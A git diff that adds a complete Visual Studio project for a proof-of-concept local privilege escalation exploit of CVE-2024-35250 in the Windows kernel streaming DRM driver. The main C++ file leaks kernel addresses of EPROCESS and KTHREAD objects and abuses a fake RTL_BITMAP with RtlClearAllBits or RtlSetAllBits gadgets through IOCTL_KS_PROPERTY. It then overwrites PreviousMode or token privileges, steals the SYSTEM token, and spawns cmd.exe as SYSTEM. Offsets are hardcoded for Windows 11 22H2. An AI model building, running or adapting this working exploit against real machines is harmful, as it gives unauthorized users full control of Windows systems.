diff --git a/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/.gitignore b/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/.gitignore
new file mode 100644
index 0000000..787841f
--- /dev/null
+++ b/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/.gitignore
@@ -0,0 +1,50 @@
+x64
+Debug
+CVE-2024-35250
+
+# Compiled object files
+*.o
+*.obj
+
+# Precompiled Headers
+*.gch
+*.pch
+
+# Compiled Dynamic libraries
+*.so
+*.dylib
+*.dll
+
+# Compiled Static libraries
+*.a
+*.lib
+
+# Executable files
+*.exe
+*.out
+*.app
+
+# Debug files
+*.dSYM/
+*.d/
+*.debug/
+
+# IDE specific files
+.vscode/
+.idea/
+*.code-workspace
+
+# Logs
+*.log
+
+# Temporary files
+*.tmp
+*.temp
+*.bak
+*.swp
+
+# Build directories
+/build/
+/bin/
+/lib/
+/dist/
\ No newline at end of file
diff --git a/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.cpp b/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.cpp
new file mode 100644
index 0000000..ca829ca
--- /dev/null
+++ b/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.cpp
@@ -0,0 +1,454 @@
+/*
+				PoC Info
+--------------------------------------------------------------
+Vulnerability:	        CVE-2024-35250
+Tested environment:	    Windows 11 22h2 Build 22621
+						Windows 10 20h2 Build 19042
+						VMWare Workstation 17 Pro
+Weakness:		        CWE-822: Untrusted Pointer Dereference
+Known limitations:	    Didn't work in Hyper-V environments
+Required privileges:    Medium IL
+--------------------------------------------------------------
+*/
+#define __STREAMS__
+#define _INC_MMREG
+//#define _SE_DEBUG_PRIVILEGE 0xc1b4
+#define _PREVIOUS_MODE		0xbaba
+#include <Windows.h>
+#include <winternl.h>
+#include <strmif.h>
+#include <ks.h>
+#include <ksproxy.h>
+#include <ksmedia.h>
+#include <stdio.h>
+#include <SetupAPI.h>
+#include <functiondiscovery.h>
+#include <mmdeviceapi.h>
+#include <stdint.h>
+#include <safeint.h>
+#include <ntstatus.h>
+#include <TlHelp32.h>
+#include <winsvc.h>
+#include "common.h"
+#include <processthreadsapi.h>
+
+#pragma comment(lib, "Ksproxy.lib")
+#pragma comment(lib, "ksuser.lib")
+#pragma comment(lib, "ntdll.lib")
+#pragma comment(lib, "ntdllp.lib")
+#pragma comment(lib, "SetupAPI.lib")
+#pragma comment(lib, "Advapi32.lib")
+
+//
+// Get the kernel object pointer for the specific process by it's handle
+// 
+int32_t GetObjPtr(_Out_ PULONG64 ppObjAddr, _In_ ULONG ulPid, _In_ HANDLE handle)
+
+{
+	int32_t Ret = -1;
+	PSYSTEM_HANDLE_INFORMATION pHandleInfo = 0;
+	ULONG ulBytes = 0;
+	NTSTATUS Status = STATUS_SUCCESS;
+
+	//
+	// Handle heap allocations to overcome STATUS_INFO_LENGTH_MISMATCH
+	//
+	while ((Status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemHandleInformation, pHandleInfo, ulBytes, &ulBytes)) == 0xC0000004L)
+	{
+		if (pHandleInfo != NULL)
+		{
+			pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pHandleInfo, (size_t)2 * ulBytes);
+		}
+
+		else
+		{
+			pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (size_t)2 * ulBytes);
+		}
+	}
+
+	if (Status != NULL)
+	{
+		Ret = Status;
+		goto done;
+	}
+
+	for (ULONG i = 0; i < pHandleInfo->NumberOfHandles; i++)
+	{
+		if ((pHandleInfo->Handles[i].UniqueProcessId == ulPid) && (pHandleInfo->Handles[i].HandleValue == (unsigned short)handle))
+		{
+			*ppObjAddr = (unsigned long long)pHandleInfo->Handles[i].Object;
+			Ret = 0;
+			break;
+		}
+	}
+
+done:
+	if (pHandleInfo != NULL)
+	{
+		HeapFree(GetProcessHeap, 0, pHandleInfo);
+	}
+	return Ret;
+}
+
+//
+// ALlocate fake bitmap for arbitrary r/w operations
+//
+void* AllocateBitmap(SIZE_T size, LPVOID baseAddress) {
+
+	LPVOID allocatedMemory = VirtualAlloc(baseAddress, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+	if (allocatedMemory == NULL)
+	{
+		printf("[-] AllocateBitmap failed with error: %d\n", GetLastError());
+		return NULL;
+	}
+
+	printf("[+] Fake RTL_BITMAP allocated at address = %p\n", allocatedMemory);
+
+	return allocatedMemory;
+}
+
+UINT_PTR GetKernelModuleAddress(const char* TargetModule)
+{
+	NTSTATUS status;
+	ULONG ulBytes = 0;
+	PSYSTEM_MODULE_INFORMATION handleTableInfo = NULL;
+
+	while ((status = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemModuleInformation, handleTableInfo, ulBytes, &ulBytes)) == STATUS_INFO_LENGTH_MISMATCH)
+	{
+		if (handleTableInfo != NULL)
+		{
+			handleTableInfo = (PSYSTEM_MODULE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, handleTableInfo, 2 * ulBytes);
+		}
+
+		else
+		{
+			handleTableInfo = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 2 * ulBytes);
+		}
+	}
+
+	if (status == 0)
+	{
+		for (ULONG i = 0; i < handleTableInfo->ModulesCount; i++)
+		{
+			char* moduleName = strstr(handleTableInfo->Modules[i].Name, TargetModule);
+			if (moduleName != NULL)
+			{
+				return (UINT_PTR)handleTableInfo->Modules[i].ImageBaseAddress;
+			}
+		}
+	}
+	else
+	{
+		if (handleTableInfo != NULL)
+		{
+			printf("[-] NtQuerySystemInformation failed. (NTSTATUS code: 0x%X)\n", status);
+			HeapFree(GetProcessHeap(), 0, handleTableInfo);
+			return 0;
+		}
+	}
+
+	HeapFree(GetProcessHeap(), 0, handleTableInfo);
+
+	return 0;
+}
+
+DWORD64 leak_gadget_address(LPCSTR GadgetName)
+{
+	DWORD64 module_base_kernel, rtlSetAllBits_address;
+	HMODULE module_base_user;
+
+	module_base_user = LoadLibraryExW(L"ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES);
+	if (!module_base_user)
+		goto error;
+
+	rtlSetAllBits_address = (DWORD64)GetProcAddress(module_base_user, GadgetName);
+	if (!rtlSetAllBits_address) {
+		goto error;
+	}
+	module_base_kernel = GetKernelModuleAddress("ntoskrnl.exe");
+	rtlSetAllBits_address = module_base_kernel + (rtlSetAllBits_address - (DWORD64)module_base_user);
+
+	return rtlSetAllBits_address;
+error:
+	printf("[-] leak_gadget_address failed\n");
+	return FALSE;
+}
+
+//
+// A wrapper to make arbitrary writes to the whole system memory address space
+//
+NTSTATUS Write64(void* Dst, void* Src, size_t Size)
+{
+	NTSTATUS Status = 0;
+	PULONG cbNumOfBytesWrite = 0;
+
+	Status = NtWriteVirtualMemory(GetCurrentProcess(), Dst, Src, Size, cbNumOfBytesWrite);
+	if (!NT_SUCCESS(Status))
+	{
+		return -1;
+	}
+	return Status;
+}
+//
+// original from https://gist.github.com/xpn/a057a26ec81e736518ee50848b9c2cd6
+//
+DWORD CreateProcessFromHandle(HANDLE Handle, LPSTR command) {
+	STARTUPINFOEXA si;
+	PROCESS_INFORMATION pi;
+	SIZE_T size;
+	BOOL ret;
+
+	// Create our PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute
+	ZeroMemory(&si, sizeof(STARTUPINFOEXA));
+
+	InitializeProcThreadAttributeList(NULL, 1, 0, &size);
+	si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(
+		GetProcessHeap(),
+		0,
+		size
+	);
+	InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
+	UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &Handle, sizeof(HANDLE), NULL, NULL);
+
+	si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
+
+	// Finally, create the process
+	ret = CreateProcessA(
+		NULL,
+		command,
+		NULL,
+		NULL,
+		true,
+		EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE,
+		NULL,
+		NULL,
+		reinterpret_cast<LPSTARTUPINFOA>(&si),
+		&pi
+	);
+
+	if (ret == false) {
+		printf("CreateProcessFromHandle failed with error = \n", GetLastError());
+		return 3;
+	}
+
+	return 0;
+}
+
+ULONG GetPidByName(const wchar_t* procname) {
+	PROCESSENTRY32 entry;
+	entry.dwSize = sizeof(PROCESSENTRY32);
+
+	ULONG pid;
+
+	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+
+	if (Process32First(snapshot, &entry) == TRUE)
+	{
+		while (Process32Next(snapshot, &entry) == TRUE)
+		{
+			if (wcscmp((const wchar_t*)entry.szExeFile, procname) == 0)
+			{
+				pid = entry.th32ProcessID;
+				break;
+			}
+		}
+	}
+
+	CloseHandle(snapshot);
+	return pid;
+}
+
+int main()
+{
+	HRESULT hr;
+	HANDLE hDrmDevice = NULL;
+	UCHAR InBuffer[sizeof(KSPROPERTY) + sizeof(EXPLOIT_DATA2)] = { 0 };
+	KSPROPERTY* pInBufProperty = (KSPROPERTY*)InBuffer;
+	EXPLOIT_DATA2* pInBufPropertyData = (EXPLOIT_DATA2*)(pInBufProperty + 1);
+
+	UCHAR UnserializePropertySetRequest[sizeof(KSPROPERTY_SERIALHDR) + sizeof(KSPROPERTY_SERIAL) + sizeof(EXPLOIT_DATA1)] = { 0 };
+
+	KSPROPERTY_SERIALHDR* pSerialHdr = (KSPROPERTY_SERIALHDR*)UnserializePropertySetRequest;
+	PKSPROPERTY_SERIAL pSerial = (KSPROPERTY_SERIAL*)(pSerialHdr + 1);
+	EXPLOIT_DATA1* pOutBufPropertyData = (EXPLOIT_DATA1*)(pSerial + 1);
+
+	BOOL res = FALSE;
+	NTSTATUS status = 0;
+
+	uint32_t Ret = 0;
+
+	const GUID categories[] = {
+		KSCATEGORY_DRM_DESCRAMBLE,
+	};
+
+	//
+	// Get a KS object device with ksproxy.ax API
+	//
+	for (int i = 0; i < sizeof(categories) / sizeof(categories[0]); i++)
+	{
+		hr = KsOpenDefaultDevice(categories[i], GENERIC_READ | GENERIC_WRITE, &hDrmDevice);
+
+		if (hr != NOERROR) {
+			printf("[-] KsOpenDefaultDevice at index %d failed with error = %x\n", i, hr);
+			return hr;
+		}
+
+		printf("[+] DRM device handle value = %p\n", hDrmDevice);
+	}
+
+#ifdef _SE_DEBUG_PRIVILEGE
+
+	HANDLE hToken;
+	uint64_t ktoken_obj = 0;
+	res = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);
+
+	if (!res)
+	{
+		printf("[-] Failed to open current process token\n");
+		return res;
+	}
+
+	res = GetObjPtr(&ktoken_obj, GetCurrentProcessId(), hToken);
+	if (res != NULL)
+	{
+		return -1;
+	}
+
+	printf("[+] Current process TOKEN address = %llx\n", ktoken_obj);
+#elif defined _PREVIOUS_MODE
+
+	uint64_t Sysproc = 0;
+	uint64_t Curproc = 0;
+	uint64_t Curthread = 0;
+
+	HANDLE hCurproc = 0;
+	HANDLE hThread = 0;
+	//
+	// Leak System _EPROCESS kernel address
+	//
+	Ret = GetObjPtr(&Sysproc, 4, (HANDLE)4);
+	if (Ret != NULL)
+	{
+		return Ret;
+	}
+	printf("[+] System EPROCESS address: %llx\n", Sysproc);
+
+	//
+	// Leak Current _KTHREAD kernel address
+	//
+	hThread = OpenThread(THREAD_QUERY_INFORMATION, TRUE, GetCurrentThreadId());
+	if (hThread != NULL)
+	{
+		Ret = GetObjPtr(&Curthread, GetCurrentProcessId(), hThread);
+		if (Ret != NULL)
+		{
+			return Ret;
+		}
+		printf("[+] Current KTHREAD address: %llx\n", Curthread);
+	}
+
+	//
+	// Leak Current _EPROCESS kernel address
+	//
+	hCurproc = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, GetCurrentProcessId());
+	if (hCurproc != NULL)
+	{
+		Ret = GetObjPtr(&Curproc, GetCurrentProcessId(), hCurproc);
+		if (Ret != NULL)
+		{
+			return Ret;
+		}
+		printf("[+] Current EPROCESS address: %llx\n", Curproc);
+	}
+#endif
+
+	//
+	// Initialize input buffer
+	//
+	pInBufProperty->Set = KSPROPSETID_DrmAudioStream;
+	pInBufProperty->Flags = KSPROPERTY_TYPE_UNSERIALIZESET;
+	pInBufProperty->Id = 0x0;
+
+	//
+	// Initialize output buffer
+	//
+	pSerialHdr->PropertySet = KSPROPSETID_DrmAudioStream;
+	pSerialHdr->Count = 0x1;
+
+	pSerial->PropertyLength = sizeof(EXPLOIT_DATA1);
+	pSerial->Id = 0x0;                // Should be null
+	pSerial->PropTypeSet.Set = KSPROPSETID_DrmAudioStream;
+	pSerial->PropTypeSet.Flags = 0x0; // Should be null
+	pSerial->PropTypeSet.Id = 0x45;   // Irrelevant value
+
+	//
+	// Intialize fake property data
+	//
+	uint64_t ntoskrnl_user_base = 0;
+	HMODULE outModule = 0;
+	UINT_PTR ntoskrnlKernelBase = GetKernelModuleAddress("ntoskrnl.exe");
+	printf("[+] ntoskrnl.exe base address = %llx\n", ntoskrnlKernelBase);
+	pOutBufPropertyData->FakeBitmap = (PRTL_BITMAP)AllocateBitmap(sizeof(RTL_BITMAP), ULongLongToPtr64(0x10000000));
+
+#ifdef _SE_DEBUG_PRIVILEGE
+	//
+	// FakeBitmap initialization for the overwriting TOKEN.Privileges fields technique
+	//
+	pOutBufPropertyData->FakeBitmap->SizeOfBitMap = 0x20 * 4; // It should be (0x20 * n) to overwrite (n/2 * 0x8) bytes at arbitrary address
+	pOutBufPropertyData->FakeBitmap->Buffer = ULongLongToPtr64(ktoken_obj + TOKEN_PRIV_WIN_11_22H2_22621); // Token present/enabled bits address
+	pInBufPropertyData->ptr_ArbitraryFunCall = ULongLongToPtr64(leak_gadget_address("RtlSetAllBits"));
+	printf("[!] RtlSetAllBits kernel address = %p\n", pInBufPropertyData->ptr_ArbitraryFunCall);
+#elif defined _PREVIOUS_MODE
+	//
+	// FakeBitmap initialization for the overwriting KTHREAD.PreviousMode field technique
+	//
+	pOutBufPropertyData->FakeBitmap->SizeOfBitMap = 0x20;
+	pOutBufPropertyData->FakeBitmap->Buffer = ULongLongToPtr64(Curthread + PREV_MODE_WIN_11_22H2_22621); //  KTHREAD.PreviousMode field address 
+	pInBufPropertyData->ptr_ArbitraryFunCall = ULongLongToPtr64(leak_gadget_address("RtlClearAllBits"));  // This gadget will zeroing KTHREAD.PreviousMode field
+	printf("[!] RtlClearAllBits kernel address = %p\n", pInBufPropertyData->ptr_ArbitraryFunCall);
+#endif
+
+	//
+	// Send property request to trigger the vulnerability
+	//
+	res = DeviceIoControl(hDrmDevice, IOCTL_KS_PROPERTY, pInBufProperty, sizeof(InBuffer), pSerialHdr, sizeof(UnserializePropertySetRequest), NULL, NULL);
+
+	if (!res)
+	{
+		printf("[-] DeviceIoControl failed\n"); // It's ok to see this message if exploit succeded
+	}
+
+#ifdef _SE_DEBUG_PRIVILEGE
+
+	HANDLE hWinLogon = OpenProcess(PROCESS_ALL_ACCESS, 0, GetPidByName(L"winlogon.exe"));
+
+	if (!hWinLogon) {
+		printf("OpenProcess failed with error = 0x%lx\n", GetLastError());
+		return FALSE;
+	}
+
+	CreateProcessFromHandle(hWinLogon, (LPSTR)"cmd.exe");
+
+	return TRUE;
+#elif defined _PREVIOUS_MODE
+	printf("[!] Leveraging DKOM to achieve LPE\n");
+	printf("[!] Calling Write64 wrapper to overwrite current EPROCESS->Token\n");
+
+	uint8_t mode = UserMode; // We set UserMode in restoring thread state phase to avoid BSOD in further process creations
+
+	Write64(ULongLongToPtr64(Curproc + EPROCESS_TOKEN_WIN_11_22H2_22621), ULongLongToPtr64(Sysproc + EPROCESS_TOKEN_WIN_11_22H2_22621), /* Token size */ 0x8);
+
+	//
+	// Restoring KTHREAD.PreviousMode phase
+	//
+	Write64(ULongLongToPtr64(Curthread + PREV_MODE_WIN_11_22H2_22621), &mode, sizeof(mode));
+
+	//
+	// Spawn the shell with "nt authority\system"
+	//
+	system("cmd.exe");
+#endif
+
+	return 0;
+}
\ No newline at end of file
diff --git a/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.sln b/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.sln
new file mode 100644
index 0000000..9918762
--- /dev/null
+++ b/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.11.35208.52
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2024-35250", "CVE-2024-35250.vcxproj", "{8A9A359B-5513-48DB-BD75-637D1AF0B5EA}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{8A9A359B-5513-48DB-BD75-637D1AF0B5EA}.Debug|x64.ActiveCfg = Debug|x64
+		{8A9A359B-5513-48DB-BD75-637D1AF0B5EA}.Debug|x64.Build.0 = Debug|x64
+		{8A9A359B-5513-48DB-BD75-637D1AF0B5EA}.Debug|x86.ActiveCfg = Debug|Win32
+		{8A9A359B-5513-48DB-BD75-637D1AF0B5EA}.Debug|x86.Build.0 = Debug|Win32
+		{8A9A359B-5513-48DB-BD75-637D1AF0B5EA}.Release|x64.ActiveCfg = Release|x64
+		{8A9A359B-5513-48DB-BD75-637D1AF0B5EA}.Release|x64.Build.0 = Release|x64
+		{8A9A359B-5513-48DB-BD75-637D1AF0B5EA}.Release|x86.ActiveCfg = Release|Win32
+		{8A9A359B-5513-48DB-BD75-637D1AF0B5EA}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {D3FBB172-3236-456B-B665-49FF80387570}
+	EndGlobalSection
+EndGlobal
diff --git a/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.vcxproj b/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.vcxproj
new file mode 100644
index 0000000..dab4deb
--- /dev/null
+++ b/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.vcxproj
@@ -0,0 +1,141 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>17.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{8a9a359b-5513-48db-bd75-637d1af0b5ea}</ProjectGuid>
+    <RootNamespace>CVE202435250</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0.19041.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="common.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="CVE-2024-35250.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.vcxproj.filters b/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.vcxproj.filters
new file mode 100644
index 0000000..ea00f65
--- /dev/null
+++ b/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.vcxproj.filters
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="源文件">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="头文件">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="资源文件">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="common.h">
+      <Filter>头文件</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="CVE-2024-35250.cpp">
+      <Filter>源文件</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.vcxproj.user b/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.vcxproj.user
new file mode 100644
index 0000000..88a5509
--- /dev/null
+++ b/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/CVE-2024-35250.vcxproj.user
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup />
+</Project>
\ No newline at end of file
diff --git a/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/common.h b/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/common.h
new file mode 100644
index 0000000..41b2d7d
--- /dev/null
+++ b/Security/EndPoint/Previledge/Windows/CVE/CVE-2024-35250/common.h
@@ -0,0 +1,133 @@
+#pragma once
+
+#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)
+#define EPROCESS_TOKEN_OFFSET			0x4B8
+#define KTHREAD_PREVIOUS_MODE_OFFSET	0x232
+#define EPROCESS_SECURE_STATE_OFFSET	0x3E0
+#define SEP_TOKEN_PRIVILEGE_OFFSET      0x40
+#define SystemHandleInformation			0x10
+#define SystemModuleInformation         11
+#define SystemHandleInformationSize		0x400000 
+
+enum _MODE
+{
+    KernelMode = 0,
+    UserMode = 1
+};
+
+typedef struct SYSTEM_MODULE {
+    ULONG                Reserved1;
+    ULONG                Reserved2;
+#ifdef _WIN64
+    ULONG				Reserved3;
+#endif
+    PVOID                ImageBaseAddress;
+    ULONG                ImageSize;
+    ULONG                Flags;
+    WORD                 Id;
+    WORD                 Rank;
+    WORD                 w018;
+    WORD                 NameOffset;
+    CHAR                 Name[255];
+}SYSTEM_MODULE, * PSYSTEM_MODULE;
+
+typedef struct SYSTEM_MODULE_INFORMATION {
